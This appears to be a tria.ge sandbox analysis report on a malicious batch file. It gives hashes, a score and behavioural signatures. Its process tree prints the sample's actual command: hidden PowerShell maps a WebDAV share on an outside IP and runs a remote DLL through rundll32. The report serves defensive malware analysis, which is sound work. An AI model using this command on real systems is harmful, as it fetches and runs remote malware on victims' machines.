Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 07:00
Static task
static1
Behavioral task
behavioral1
Sample
12567224832514716799.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
12567224832514716799.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
12567224832514716799.bat
-
Size
2KB
-
MD5
d1beb6ad5184c81cd1503ef9676c04c6
-
SHA1
19382c776c732c6a49ab298f102aadf5d5622a40
-
SHA256
d502b2ea16b3fe9feff5c1234a63279d576d927eec6ae85502b5c5b1854e8289
-
SHA512
f60270f36e0e81ec981bc36342bc30f009051c52bcec8ed65dc70f3f4cf1444c998b79416666bcbc2cdefdd37b46fb2f06ae96f8178efcbd058aca8668870947
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3040 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3040 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2272 wordpad.exe 2272 wordpad.exe 2272 wordpad.exe 2272 wordpad.exe 2272 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2728 wrote to memory of 2272 2728 cmd.exe 31 PID 2728 wrote to memory of 2272 2728 cmd.exe 31 PID 2728 wrote to memory of 2272 2728 cmd.exe 31 PID 2728 wrote to memory of 3040 2728 cmd.exe 32 PID 2728 wrote to memory of 3040 2728 cmd.exe 32 PID 2728 wrote to memory of 3040 2728 cmd.exe 32 PID 3040 wrote to memory of 2732 3040 powershell.exe 34 PID 3040 wrote to memory of 2732 3040 powershell.exe 34 PID 3040 wrote to memory of 2732 3040 powershell.exe 34 PID 3040 wrote to memory of 2612 3040 powershell.exe 35 PID 3040 wrote to memory of 2612 3040 powershell.exe 35 PID 3040 wrote to memory of 2612 3040 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\12567224832514716799.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\513.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2732
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\513.dll entry3⤵PID:2612
-
-